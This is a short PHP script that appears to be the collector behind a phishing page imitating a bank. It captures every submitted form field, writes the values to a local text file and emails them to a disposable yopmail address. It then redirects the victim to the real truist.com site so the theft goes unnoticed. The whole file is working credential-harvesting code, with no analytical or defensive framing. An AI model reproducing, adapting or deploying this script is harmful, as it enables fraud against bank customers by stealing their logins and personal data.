<?php

$SEND = "toofpi@yopmail.com"; // Your email

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $data = [];

    // Loop through POST data and sanitize
    foreach ($_POST as $key => $value) {
        $cleanValue = htmlspecialchars(trim($value));
        $data[$key] = $cleanValue;
    }

    // Convert data to a formatted string
    $formattedData = "===== New Submission =====\n";
    foreach ($data as $key => $value) {
        $formattedData .= ucfirst($key) . ": " . $value . "\n";
    }
    $formattedData .= "==========================\n\n";

    // Save to text file
    $file = "data.txt";
    file_put_contents($file, $formattedData, FILE_APPEND | LOCK_EX);

    // Send email
    $subject = "New Data Submission";
    $headers = "From: noreply@yourdomain.com\r\n";
    $headers .= "Content-Type: text/plain; charset=UTF-8";

    mail($SEND, $subject, $formattedData, $headers);

    // Redirect after submission
    header("Location: https://truist.com/");
    exit();
} else {
    echo "Invalid request.";
}

?>
